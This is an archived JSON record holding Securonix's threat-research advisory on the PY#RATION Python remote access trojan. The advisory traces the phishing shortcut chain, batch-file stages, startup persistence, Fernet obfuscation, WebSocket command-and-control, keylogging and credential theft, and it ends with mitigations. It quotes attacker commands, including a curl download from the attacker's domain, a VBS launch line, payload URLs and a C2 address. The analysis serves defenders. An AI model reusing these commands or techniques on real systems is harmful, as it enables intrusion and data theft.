{
	"id": "7c6d30b8-67c1-4e6f-80bb-2d253955dee0",
	"created_at": "2026-04-06T00:10:43.215573Z",
	"updated_at": "2026-04-10T03:21:24.877496Z",
	"deleted_at": null,
	"sha1_hash": "646a842780c501653b116c1c7e1a41fd7fd9d07a",
	"title": "Securonix Security Advisory: Python-Based PY#RATION Attack Campaign Leverages Fernet Encryption and Websockets to Avoid Detection",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 3434854,
	"plain_text": "Securonix Security Advisory: Python-Based PY#RATION Attack\r\nCampaign Leverages Fernet Encryption and Websockets to Avoid\r\nDetection\r\nArchived: 2026-04-05 14:38:10 UTC\r\nBy Securonix Threat Research: D. Iuzvyk, T. Peck, O. Kolesnikov\r\nFigure 1: PY#RATION payload\r\nIntroduction\r\nThe Securonix Threat Research Team has identified a new Python-based attack campaign (tracked by Securonix\r\nas PY#RATION) in the wild. The malware exhibits remote access trojan (RAT) behavior, allowing for control of\r\nand persistence on the affected host. As with other RATs, PY#RATION possesses a whole host of features and\r\ncapabilities, including data exfiltration and keylogging. What makes this malware particularly unique is its\r\nutilization of websockets for both command and control (C2) communication and exfiltration as well as how it\r\nevades detection from antivirus and network security measures.\r\nThe use of Python for malicious purposes is increasing, and is noteworthy for its similarities to Go-based\r\nmalware, as demonstrated by the GO#WEBBFUSCATOR attack campaign we covered previously. To illustrate,\r\nmalicious code can be compiled and “packed” into an executable requiring no outside code or library\r\nhttps://www.securonix.com/blog/security-advisory-python-based-pyration-attack-campaign/\r\nPage 1 of 17\n\ndependencies, making cross-platform support possible. Creating Python executables in Windows can be trivial and\r\nrequires only the knowledge of a few existing tools such as Py2exe or auto-py-to-exe, for example.\r\nIn this case, starting in August 2022, we identified malicious payload samples associated with this attack\r\ncampaign containing v1.0 in the code. Today our latest identified payload sample contains v1.6.0, meaning the\r\nmalicious payloads used by the attackers as part of this campaign went through several enhancement iterations\r\nand are still under development. 
It is also apparent that new features and anti-evasion techniques have since been\r\nintroduced into the later versions.\r\nTechnical analysis: initial compromise\r\nInitial infection of PY#RATION begins with a phishing email containing a malicious attachment .zip file,\r\ndocuments.zip in our case for v1.6.0. The zip file is password protected. Since we didn’t have access to the body\r\nof the email, after some brute forcing the password “1988” was discovered. Typically this password would have\r\nbeen found in the body of the email.\r\nContained inside the zip file are two shortcut (.lnk) files that reference two corresponding files located on a remote\r\nC2 server, front.jpg(.lnk) and back.jpg(.lnk). The shortcuts appear as an image icon with a link to add validity to\r\nthe lure. When the shortcut is executed, the remote server is contacted to download two additional files to the\r\nuser’s temp directory.\r\nFigure 1a: Observed PY#RATION attack chain\r\nStage 1: .LNK shortcut file execution\r\nCode execution begins similarly to most phishing-based malware we see today. Once the zip file is extracted, the\r\nuser is presented with two convincing .lnk files disguised as the two .jpg files. When executed by the user, a front\r\nand back image of a seemingly valid UK driver’s license is displayed along with the malicious code.\r\nFigure 2: v1.0 shortcut .lnk lure files front.jpg (left) and back.jpg (right) [PII removed]\r\nThe lure files are presented to the user upon executing the corresponding shortcut (.lnk) files in addition to the\r\nmalicious code front.bat and back.bat as seen in the figure below. We’ll dive into the contents of the .bat files\r\nfurther down. 
In any malware scenario, the purpose of the lure files is simply to present the victim user with an\r\nexpected result in an attempt not to arouse suspicion.\r\nFigure 3: v1.0 shortcut .lnk files\r\nEach .lnk file downloads a .txt file. The files are then renamed to .bat files and executed.\r\nfront.jpg.lnk – hxxps://install.realproheros[.]com/front.txt\r\nback.jpg.lnk – hxxps://install.realproheros[.]com/back.txt\r\nThis brings us into stage 2 of the initial infection. Malicious VB script is then echoed into another file, “c.txt” in\r\nour case. Wscript.exe is then called to execute the newly built file as seen in figure 4 below.\r\nFigure 4: v1.0 front.bat\r\nAs you can see in the image, front.jpg is downloaded and saved into settings.bat. The contents of\r\nhxxps://install[.]realproheros.com/c.txt are then written into c.bat, which is then written into b.bat.\r\nThe file settings.bat simply downloads and executes front.jpg, which in this case opens the lure image of the\r\nfront of the driver’s license as seen in figure 1.\r\nWhen analyzing version 1.6.0, the initial code execution vector beginning from the shortcut file is slightly\r\ndifferent. While the technique originating with “front.jpg.lnk” and “back.jpg.lnk” remains unchanged, the initial\r\nscript is pulled down from pastebin.\r\nhxxps://pastebin[.]com/raw/Mb7zPnML\r\nFigure 5: v1.6.0 front.jpg.lnk and front.bat\r\nStage 2: Batch file execution\r\nWhen we take a look at the contents of the “c.bat” files, things start to get very interesting, which leads us into\r\nstage 2 of the initial compromise chain. 
Below is a screenshot of the v1.0 sample we identified last year.\r\nFigure 6: v1.0 c.bat contents\r\nThe batch file begins by creating directories in the user’s %tmp% directory, Cortana, and Cortana/Setup.\r\nIt then dumps the contents of lines 6-24 into another file in %tmp%/CortanaDefault.bat. This file essentially checks\r\nfor the existence of a few files, and then downloads them:\r\nhxxps://install[.]realproheros.com/unrar.cert – unrar.cert\r\nhxxps://install[.]realproheros.com/setup.rar – setup.rar\r\nhxxps://install[.]realproheros.com/assist.rar – assist.rar\r\nNext, the Microsoft utility certutil.exe is leveraged to decode “unrar.cert” into the exe file “unrar.exe” which is\r\nthen executed and extracts the contents of “assist.rar” and then “setup.rar” using the password “2022” for v1.0 or\r\nthe password “P@2022” for version 1.6.0.\r\nOne of the extracted files “ctask.exe” is then executed using the parameter “rmpath” and the value\r\n“433a2f57696e646f7773202f” which is the hex value of “C:/Windows”.\r\nA basic .vbs script is created and saved as “%tmp%/Cortana/inv.vbs” which accepts two parameters, the first\r\nbeing the name of an executable to run, the second being parameters for that executable:\r\necho CreateObject^(“Wscript.Shell”^).Run “””” ^\u0026 WScript.Arguments^(0^) ^\u0026 “”””, 0, False\r\nThe executable “ctask.exe” is once again executed using the parameters “movepath\r\n25746d70252f436f7274616e61 256c6f63616c6170706461746125” which when decoded from hex becomes\r\n“/%tmp%/Cortana” and “%localappdata%”\r\nPersistence is established by dropping CortanaAssist.bat into the local user’s startup directory\r\n“%appdata%/Microsoft/Windows/Start Menu/Programs/Startup/CortanaAssist.bat”. This will cause it to execute\r\nevery time the user starts their workstation.\r\nExamining version 1.6.0, the end goal is essentially the same. 
Interestingly enough, as you can see at the end of\r\nalmost every primary action, there is some error checking which sends a status probe back to the attacker\r\nindicating the script’s progress.\r\nhxxps://api.safeit[.]com/install/log?error=[error_message]\r\nThe domain used here is rather interesting. The site safeit.com is a legitimate website that has been in existence\r\nsince the 90s and offers secure file deletion products. The subdomain api.safeit[.]com appears to have been\r\nvery short-lived. Its purpose as well as its relation to the attackers behind the malware remains unknown.\r\nFigure 7: v1.6.0 c.bat contents\r\nIn the case of each file version the main goal is to download and extract a binary payload through a series of bat\r\nfiles. The payload is rather interesting and functions as a Python-based RAT. We’ll dig into this in the next section.\r\nAnalysis: Python Binary CortanaAssistance.exe\r\nAs we briefly touched on earlier, it’s possible to pack an executable using automated tools that take Python code\r\nand convert it to an all-in-one Windows executable. This can easily be done using automated tools such as\r\npyinstaller or py2exe. This Python-packed binary will contain all the required Python libraries needed for the\r\noriginal code to execute properly on any Windows system. The side effect is that the binary file ends up being\r\nquite large.\r\nThe v1.0 binary file “CortanaAssistance.exe” is a 32-bit executable and is on the larger side, standing at just over\r\n14MB. Version 1.6.0 is much larger at just over 32MB. 
Both were packed using Python v3.10.0.\r\nFigure 8: PE binary information for CortanaAssistance.exe\r\nAs the binary is a Py2exe packed executable, we can extract the file’s contents using a tool like pyinstxtractor into\r\nanother directory to examine it. As seen in figure 9 below, this mostly contains Python library files. What interests\r\nus, however, is the main module, “main.pyc”, which contains the compiled Python bytecode of the original script.\r\nFigure 9: CortanaAssistance.exe extracted contents\r\nUsing a Python decompiler, main.pyc can be decompiled into its original Python code. The original Python script\r\nwas compiled in Python version 3.10.0. By analyzing the original code we get a better understanding as to the\r\ncapabilities of the malware.\r\nPython code: v1.0 vs 1.6.0\r\nThe difference between the two versions is quite staggering. With about 1000 lines of code added in v1.6.0 as\r\ncompared to our original discovered sample, it’s overall quite telling that this particular Python RAT is still under\r\ndevelopment.\r\nThe 1.6.0 version’s main Python code was also hidden behind a trivial layer of fernet, an implementation which is\r\npart of a recipe from the Python cryptography package that can be used to encrypt and authenticate data. This\r\nhelps attackers reduce the ability for AV detections to trigger on anything malicious, as it masks many easily\r\nidentifiable strings compared to v1.0 of the binary.\r\nFigure 10: v1.6.0 main.py showing fernet encryption\r\nThe original source code is decrypted and executed as seen in the figure above.\r\nOnce decrypted, the later version also features much cleaner code with formal comment blocks at each function or\r\nclass which clearly describe its intended purpose. 
Because of this, it is easy to conclude that this RAT is being\r\nsold, though at the time of writing we are not able to confirm this or identify its origin.\r\nNext, let’s dive into several interesting classes contained within the Python RAT’s source code.\r\nPython code: app class\r\nBoth analyzed versions of the original Python code contain a class “app” which handles basic configuration\r\nparameters such as IP and port information. They’re both configured to the same IP address 169[.]239.129.108\r\nand port 5555, which downloads and reads in a configuration file “/client/config”. It’s quite surprising that the same\r\nIP was used over a four-month period and is still active at the time of writing.\r\nFigure 11: main.py containing class app and connection strings\r\nThe later version adds some sessioning capabilities which leverage the function get_unique_identity(), which\r\nconsists of the target host’s MAC address and user name. The configuration parameter IN_NETWORK_SCAN is\r\nalso new and makes use of the Python class NetworkScanner, which, as its name suggests, attempts to probe the\r\nsurrounding network for IPs and ports.\r\nPython code: NetworkScanner class\r\nUnique to v1.6.0, this gives the Python RAT added network enumeration capabilities over prior versions.\r\nThe class has a few tunable configuration parameters which define port ranges, batch size, and sleep time.\r\nFigure 12: main.py showing class NetworkScanner\r\nPython code: actions class\r\nThe “actions” class gives the attacker the ability to transfer files from host to C2 or vice versa. 
The code block was\r\nalmost identical between the two versions, other than the unique identity being added to the headers in\r\nv1.6.0.\r\nFigure 13: main.py with actions class v1.0\r\nPython code: KeyRecorder class\r\nThe not-so-subtle “KeyRecorder” class does just as the name suggests — it acts as a keylogger that lets the\r\nattacker record the victim’s keystrokes once infection has fully taken place. Other than some slight code variations\r\nand trimming, the classes between the two identified versions were functionally the same.\r\nFigure 14: main.py showing KeyRecorder class v1.0\r\nThe malware features several more classes that allow for additional functionality such as the “Command” class.\r\nThis allows the attacker to interact with the system by issuing shell commands. Other classes allow for general\r\nenumeration which provides system information and antivirus protection status.\r\nPython code: other classes and functions\r\nAfter analyzing the source code, we can determine that the PY#RATION malware contains the following\r\nadditional functionalities:\r\nHost enumeration\r\nSystem shell commands\r\nDownload/upload files\r\nPassword/cookie extraction from browser stores\r\nNSSProxy functionality\r\nSystem enumeration\r\nClipboard stealer\r\nAntivirus detection/enumeration\r\nAnalysis: C2 communication and infrastructure\r\nAnother aspect which makes this malware unique is the fact that it leverages websockets to establish C2\r\ncommunication back to the attacker’s server.\r\nThe WebSocket protocol works over a single TCP connection, but unlike HTTP or HTTPS it uses an API standard\r\nwhich upgrades the HTTP connection. The upgraded connection will typically work over port 80 or 443. 
However,\r\nonce the connection has been upgraded, WebSockets can enable streams of messages using full-duplex\r\ncommunication, which is currently not available over a standard HTTP or HTTPS connection.\r\nUsing WebSockets for C2 communication is less common as it requires much more time to configure the remote\r\nC2 server than with other, more common methods.\r\nThe PY#RATION malware leverages the Python Socket.IO framework, which provides both\r\nclient and server WebSocket communication.\r\nFigure 15: Socket.IO and WebSockets C2\r\nSurprisingly enough, only a single IP address (“169[.]239.129.108”) was identified for C2 throughout the entire\r\nattack chain. Again, from v1.0 back in August to v1.6.0 found in this month’s\r\nsample, the sole IP remained the same and is still online at the time of writing.\r\nToday, the IP address scores a surprisingly clean 0/106 blacklist score on IPVOID, meaning that this particular\r\ncampaign has gone undetected for quite some time.\r\nFurther analysis: post exploitation bonus round\r\nAfter executing the 1.0 version of the malware, the attackers downloaded an additional executable, “one.exe”,\r\nwhich they then used to execute commands. The executable was also a Python packed .exe file, which allowed for\r\ncode execution. The file was downloaded by the attackers using curl with the following command:\r\ncurl.exe “hxxps://install[.]realproheros.com/one.rar”\r\nThe contents were extracted and one.exe was executed along with given parameters:\r\nProcess CommandLine\r\ncmd.exe c:\\windows\\system32\\cmd.exe /c “”%%tmp%%/one.exe” driver=chrome”\r\none.exe “c:\\users\\jalston\\appdata\\local\\temp/one.exe” driver=chrome\r\none.exe “c:\\users\\jalston\\appdata\\local\\temp/one.exe” driver=chrome\r\nThe file contained an embedded Python code file called “one_encrypted.pyc”. 
When decoded using the same\r\nmethods as in the previous executable, a large Fernet-encrypted string was presented. This same\r\ntechnique was also present in the v1.6.0 main.py Python code found within the binary.\r\nFigure 16: one_encrypted.py with fernet encryption\r\nDecoding the encrypted fernet string by replacing “exec” strings with “print” presents us with additional Python\r\ncode which gives us insights as to the purpose of this executable.\r\nThe “one.exe” binary appears to be another variant of a Python-based infostealer malware, which grabs and\r\nextracts local PC data including browser credential stores, cryptocurrency wallets, and user and system data.\r\nFigure 17: decoded fernet code snippet affecting browser stores and crypto\r\nAbove, we listed command flags associated with “one.exe”, for example “driver=chrome”. The purpose of that\r\nflag is to specify a broad target for the malware to execute and run against. In this case, browser data is recorded,\r\nparsed and sent out to C2 as seen in figure 18.\r\nFigure 18: browser data extraction\r\nThe similarity between the two binaries is striking as both leverage Python as the main programming language,\r\nall in a Windows executable format. Even though they serve two completely different functions, it would appear\r\nthat both originated from the same threat actor.\r\nWhile this additional binary sample is interesting, the source or origin appears to be the same as the original\r\nPython RAT. 
Much of the functionality of one.exe appears to have been included in the later v1.6.0 of the\r\nPython RAT.\r\nConclusion\r\nThe PY#RATION malware is not only relatively difficult to detect; the fact that it is a compiled Python binary also\r\nmakes it extremely flexible, as it will run on almost any target including Windows, OSX, and Linux variants.\r\nPython packages do not need to be installed on the host as all of the needed libraries are self-contained in the\r\nexecutable itself.\r\nAt the time of writing, v1.6.0 of the malware produced only 1/70 detections according to VirusTotal. Malicious\r\ncode packed into .exe files using PyInstaller or py2exe is already difficult to detect. The fact that the threat actors\r\nleveraged a layer of fernet encryption to hide the original source compounds the difficulty of detecting known\r\nmalicious strings.\r\nAs English appears to be the consistent language throughout, and the lure images are of a UK driver’s license, it’s\r\nlikely that the intended target could be the UK or North America.\r\nSecuronix recommendations and mitigations\r\nAvoid opening any attachments, especially those that are unexpected or are from outside the\r\norganization. 
Be extra vigilant with .zip, .iso, and .img attachments.\r\nImplement an application whitelisting policy to restrict the execution of unknown binaries.\r\nDeploy additional process-level logging such as Sysmon for additional log detection coverage.\r\nSecuronix customers can scan endpoints using the Securonix Seeder Hunting Queries below.\r\nFor customers, we have a follow-up with recommended detections on how to detect and mitigate PY#RATION\r\nattacks using Securonix.\r\nReferences\r\nLOLbas-Project: Mshta.exe\r\nhttps://lolbas-project.github.io/lolbas/Binaries/Mshta/\r\nPython Malware On The Rise, July 14, 2020: https://www.cyborgsecurity.com/cyborg-labs/python-malware-on-the-rise/\r\nGithub – Py2exe:\r\nhttps://github.com/py2exe/py2exe\r\nGithub – auto-py-to-exe:\r\nhttps://github.com/brentvollebregt/auto-py-to-exe\r\nThe Socket.IO Server: https://python-socketio.readthedocs.io/en/latest/server.html\r\ncryptography.io – Fernet (symmetric encryption)\r\nhttps://cryptography.io/en/latest/fernet/\r\nAttack surface reduction rules reference, 06/28/2022: https://docs.microsoft.com/en-us/microsoft-365/security/defender-endpoint/attack-surface-reduction-rules-reference?view=o365-worldwide\r\nSource: https://www.securonix.com/blog/security-advisory-python-based-pyration-attack-campaign/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://www.securonix.com/blog/security-advisory-python-based-pyration-attack-campaign/"
	],
	"report_names": [
		"security-advisory-python-based-pyration-attack-campaign"
	],
	"threat_actors": [],
	"ts_created_at": 1775434243,
	"ts_updated_at": 1775791284,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/646a842780c501653b116c1c7e1a41fd7fd9d07a.pdf",
		"text": "https://archive.orkl.eu/646a842780c501653b116c1c7e1a41fd7fd9d07a.txt",
		"img": "https://archive.orkl.eu/646a842780c501653b116c1c7e1a41fd7fd9d07a.jpg"
	}
}